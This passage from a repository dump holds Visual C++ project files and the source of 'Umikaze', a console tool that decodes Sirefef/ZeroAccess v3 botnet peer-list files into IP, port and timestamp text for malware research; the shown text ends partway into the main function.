    "path": "Source/Shigure/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by resource.rc\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE        101\n#define _APS_NEXT_COMMAND_VALUE         40001\n#define _APS_NEXT_CONTROL_VALUE         1001\n#define _APS_NEXT_SYMED_VALUE           101\n#endif\n#endif\n"
  },
  {
    "path": "Source/Umikaze/Umikaze.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>Umikaze</RootNamespace>\n    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" 
Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v140</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" 
Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n    <TargetName>zadecode32</TargetName>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n    <TargetName>zadecode64</TargetName>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      
<SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <ControlFlowGuard>Guard</ControlFlowGuard>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      
<Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <ControlFlowGuard>Guard</ControlFlowGuard>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>No</GenerateDebugInformation>\n      <EntryPointSymbol>SfMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"..\\minirtl\\cmdline.c\" />\n    <ClCompile Include=\"..\\minirtl\\hextou64.c\" />\n    <ClCompile Include=\"..\\minirtl\\hextoul.c\" />\n    <ClCompile Include=\"..\\minirtl\\i64tostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\itostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoi.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoi64.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtou64.c\" />\n    <ClCompile Include=\"..\\minirtl\\strtoul.c\" />\n    <ClCompile Include=\"..\\minirtl\\u64tohex.c\" />\n    <ClCompile Include=\"..\\minirtl\\u64tostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\ultohex.c\" />\n    <ClCompile Include=\"..\\minirtl\\ultostr.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcat.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcmp.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcmpi.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strcpy.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strend.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strlen.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncmp.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncmpi.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strncpy.c\" />\n    <ClCompile 
Include=\"..\\minirtl\\_strstr.c\" />\n    <ClCompile Include=\"..\\minirtl\\_strstri.c\" />\n    <ClCompile Include=\"..\\shared\\cui.c\" />\n    <ClCompile Include=\"..\\shared\\md5.c\" />\n    <ClCompile Include=\"..\\shared\\util.c\" />\n    <ClCompile Include=\"main.c\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\..\\minirtl\\cmdline.h\" />\n    <ClInclude Include=\"..\\..\\minirtl\\minirtl.h\" />\n    <ClInclude Include=\"..\\..\\minirtl\\rtltypes.h\" />\n    <ClInclude Include=\"..\\minirtl\\cmdline.h\" />\n    <ClInclude Include=\"..\\minirtl\\minirtl.h\" />\n    <ClInclude Include=\"..\\minirtl\\rtltypes.h\" />\n    <ClInclude Include=\"..\\shared\\cui.h\" />\n    <ClInclude Include=\"..\\shared\\global.h\" />\n    <ClInclude Include=\"..\\shared\\md5.h\" />\n    <ClInclude Include=\"..\\shared\\ntos.h\" />\n    <ClInclude Include=\"..\\shared\\util.h\" />\n    <ClInclude Include=\"..\\shared\\za.h\" />\n    <ClInclude Include=\"resource.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"resource.rc\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Source/Umikaze/Umikaze.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n    <Filter Include=\"minirtl\">\n      <UniqueIdentifier>{5e475bb5-a4f5-471e-b3c8-d87ad53517d2}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"shared\">\n      <UniqueIdentifier>{4b54bbae-5cb8-4e4d-8558-c08ddc6ea92b}</UniqueIdentifier>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"main.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcat.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strcpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strend.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strlen.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncmpi.c\">\n      
<Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strncpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\cmdline.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtou64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\ultostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\util.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\cui.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoul.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strstr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\_strstri.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\hextou64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\hextoul.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\i64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\itostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\strtoi64.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\u64tohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\u64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\minirtl\\ultohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\shared\\md5.c\">\n      <Filter>shared</Filter>\n    </ClCompile>\n  </ItemGroup>\n  
<ItemGroup>\n    <ClInclude Include=\"..\\..\\minirtl\\cmdline.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\..\\minirtl\\rtltypes.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\..\\minirtl\\minirtl.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\za.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\ntos.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\util.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\cui.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"resource.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\global.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\cmdline.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\minirtl.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\minirtl\\rtltypes.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\md5.h\">\n      <Filter>shared</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"resource.rc\">\n      <Filter>Resource Files</Filter>\n    </ResourceCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Source/Umikaze/Umikaze.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n</Project>"
  },
  {
    "path": "Source/Umikaze/main.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n*  TITLE:       MAIN.C\n*\n*  VERSION:     1.02\n*\n*  DATE:        01 Dec 2017\n*\n*  Umikaze program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"..\\shared\\global.h\"\n#include \"..\\shared\\cui.h\"\n\nHANDLE g_ConOut = NULL;\nWCHAR g_BE = 0xFEFF;\nBOOL g_ConsoleOutput = FALSE;\n\n#define T_SFDECODETITLE L\"Sirefef/ZeroAccess 3 peer list decoder v1.0 (10/01/16)\"\n#define T_SFDECODEUSAGE L\"Usage: zadecode peerlist_filename [type 32 or 64, default 32]\\n\\r\\te.g. zadecode s32 32\\r\\n\"\n#define T_SFDECODEMODE  L\"Wrong mode, possible values 32 or 64\\r\\n\"\n#define T_SFUNSUCCESSF  L\"Error generating list\"\n#define T_SFBADDATA     L\"File has wrong structure or damaged\"\n#define T_SFGENERATED   L\"File generated \"\n#define T_SFPRESSANYKEY L\"\\r\\nPress Enter to exit\"\n\n/*\n* SfDecodePeerList\n*\n* Purpose:\n*\n* Decode peer list to file, ZA v3 variant.\n*\n*/\nNTSTATUS SfDecodePeerList(\n    LPWSTR lpInFileName,\n    LPWSTR lpOutFileName,\n    ULONG uType\n)\n{\n    BOOL                       cond = FALSE;\n    NTSTATUS                   status = STATUS_UNSUCCESSFUL;\n    HANDLE                     hFile = NULL;\n    OBJECT_ATTRIBUTES          obja;\n    IO_STATUS_BLOCK            iost;\n    UNICODE_STRING             NtFileName;\n    FILE_STANDARD_INFORMATION  fsi;\n    PUCHAR                     FileBuffer = NULL;\n\n    ULONG         i, j, c, Port, bytesIO;\n    PZA_PEERINFO  peer;\n    LARGE_INTEGER ftime;\n    SYSTEMTIME    st1;\n    WCHAR         text[MAX_PATH + 1];\n\n    RtlSecureZeroMemory(&NtFileName, 
sizeof(NtFileName));\n\n    do {\n        //open input file\n        if (RtlDosPathNameToNtPathName_U(lpInFileName, &NtFileName, NULL, NULL) == FALSE)\n            break;\n\n        InitializeObjectAttributes(&obja, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);\n        status = NtCreateFile(&hFile, FILE_READ_ACCESS | SYNCHRONIZE, &obja, &iost, NULL, 0,\n            FILE_SHARE_READ, FILE_OPEN,\n            FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);\n        if (!NT_SUCCESS(status))\n            break;\n\n        //get file size\n        status = NtQueryInformationFile(hFile, &iost, &fsi,\n            sizeof(FILE_STANDARD_INFORMATION),\n            FileStandardInformation);\n        if (!NT_SUCCESS(status))\n            break;\n\n        //file must consist of whole ZA_PEERINFO records\n        c = fsi.EndOfFile.LowPart % sizeof(ZA_PEERINFO);\n        if (c != 0) {\n            status = STATUS_BAD_DATA;\n            break;\n        }\n\n        FileBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, fsi.EndOfFile.LowPart);\n        if (FileBuffer == NULL) {\n            //status still holds success from the previous call, report the failure explicitly\n            status = STATUS_NO_MEMORY;\n            break;\n        }\n\n        //read file to buffer\n        status = NtReadFile(hFile, NULL, NULL, NULL, &iost, FileBuffer, fsi.EndOfFile.LowPart, NULL, NULL);\n        if (!NT_SUCCESS(status))\n            break;\n\n        //close input file\n        NtClose(hFile);\n        hFile = NULL;\n        RtlFreeUnicodeString(&NtFileName);\n\n        //create output file\n        if (RtlDosPathNameToNtPathName_U(lpOutFileName, &NtFileName, NULL, NULL) == FALSE) {\n            //status still holds success from NtReadFile, do not return it\n            status = STATUS_UNSUCCESSFUL;\n            break;\n        }\n\n        InitializeObjectAttributes(&obja, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);\n        status = NtCreateFile(&hFile, FILE_WRITE_ACCESS | SYNCHRONIZE, &obja, &iost, NULL, 0,\n            0, FILE_OVERWRITE_IF,\n            FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);\n        if (!NT_SUCCESS(status))\n            break;\n\n        //write byte order mark first, output is UTF-16 text\n        NtWriteFile(hFile, NULL, NULL, NULL, &iost, &g_BE, sizeof(g_BE), NULL, NULL);\n\n        c = 
fsi.EndOfFile.LowPart / sizeof(ZA_PEERINFO);\n        for (i = 0, j = 0; i < c; i += 1, j += sizeof(ZA_PEERINFO)) {\n\n            peer = (ZA_PEERINFO *)&FileBuffer[j];\n\n            RtlSecureZeroMemory(&text, sizeof(text));\n            RtlIpv4AddressToStringW((struct in_addr*)&peer->IP, (PWSTR)&text);\n\n            _strcat(text, TEXT(\":\"));\n\n            Port = 0x4000 + (peer->Port);\n            if (uType == 64) Port += 0x4000;\n            ultostr(Port, _strend(text));\n            _strcat(text, TEXT(\" \"));\n\n            RtlSecondsSince1980ToTime((peer->TimeStamp * 3600) - 0xbf000000, &ftime);\n            RtlSecureZeroMemory(&st1, sizeof(st1));\n            if (FileTimeToSystemTime((PFILETIME)&ftime, &st1)) {\n                ultostr(st1.wDay, _strend(text));\n                _strcat(text, TEXT(\"/\"));\n                ultostr(st1.wMonth, _strend(text));\n                _strcat(text, TEXT(\"/\"));\n                ultostr(st1.wYear, _strend(text));\n                _strcat(text, TEXT(\" \"));\n                ultostr(st1.wHour, _strend(text));\n                _strcat(text, TEXT(\":\"));\n                ultostr(st1.wMinute, _strend(text));\n                _strcat(text, TEXT(\":\"));\n                ultostr(st1.wSecond, _strend(text));\n            }\n            _strcat(text, TEXT(\"\\r\\n\"));\n\n            bytesIO = (ULONG)(_strlen(text) * sizeof(WCHAR));\n            status = NtWriteFile(hFile,\n                NULL,\n                NULL,\n                NULL,\n                &iost,\n                text,\n                bytesIO,\n                NULL,\n                NULL);\n        }\n\n    } while (cond);\n\n    if (hFile) NtClose(hFile);\n    if (FileBuffer) RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, FileBuffer);\n    if (NtFileName.Buffer) RtlFreeUnicodeString(&NtFileName);\n\n    return status;\n}\n\n/*\n* SfProcessCmdLine\n*\n* Purpose:\n*\n* Parse command line and do the job.\n*\n*/\nUINT SfProcessCmdLine(\n    LPWSTR 
lpCommandLine\n)\n{\n    NTSTATUS  status;\n    ULONG     rlen, uType = 32;\n    WCHAR     textbuf[MAX_PATH + 1], textbuf2[MAX_PATH * 2];\n    WCHAR     szMode[MAX_PATH + 1];\n\n    //path\n    //capacity is given in WCHARs, not bytes, so a long argument cannot overrun the stack buffer\n    rlen = 0;\n    RtlSecureZeroMemory(&textbuf, sizeof(textbuf));\n    GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&textbuf, sizeof(textbuf) / sizeof(WCHAR), &rlen);\n    if (rlen == 0) {\n\n        SfcuiPrintText(g_ConOut,\n            T_SFDECODEUSAGE,\n            g_ConsoleOutput, FALSE);\n\n        return (UINT)-1;\n    }\n\n    //type\n    rlen = 0;\n    RtlSecureZeroMemory(&szMode, sizeof(szMode));\n    GetCommandLineParam(lpCommandLine, 2, (LPWSTR)&szMode, sizeof(szMode) / sizeof(WCHAR), &rlen);\n    if (rlen == 0) {\n        uType = 32;\n    }\n    else {\n        uType = strtoul(szMode);\n        if (uType != 32 && uType != 64) {\n\n            SfcuiPrintText(g_ConOut,\n                T_SFDECODEMODE,\n                g_ConsoleOutput, FALSE);\n\n            return (UINT)-2;\n        }\n    }\n\n    //output name is input name plus a type specific suffix\n    _strcpy(textbuf2, textbuf);\n\n    if (uType == 32) {\n        _strcat(textbuf2, L\".d32.txt\");\n    }\n    else {\n        _strcat(textbuf2, L\".d64.txt\");\n    }\n\n    status = SfDecodePeerList(textbuf, textbuf2, uType);\n    switch (status) {\n\n\n    case STATUS_BAD_DATA:\n\n        SfcuiPrintText(g_ConOut,\n            T_SFBADDATA,\n            g_ConsoleOutput, FALSE);\n\n        return (UINT)-3;\n        break;\n\n    case STATUS_SUCCESS:\n\n        SfcuiPrintText(g_ConOut,\n            T_SFGENERATED,\n            g_ConsoleOutput, FALSE);\n\n        SfcuiPrintText(g_ConOut,\n            textbuf2,\n            g_ConsoleOutput, FALSE);\n\n        break;\n\n    default:\n        SfcuiPrintText(g_ConOut,\n            T_SFUNSUCCESSF,\n            g_ConsoleOutput, FALSE);\n\n        return (UINT)-4;\n        break;\n    }\n\n    return 0;\n}\n\n/*\n* SfMain\n*\n* Purpose:\n*\n* Umikaze main.\n*\n*/\nvoid SfMain(\n    VOID\n)\n{\n    BOOL         cond = FALSE;\n    UINT         uResult = 0;\n    DWORD   
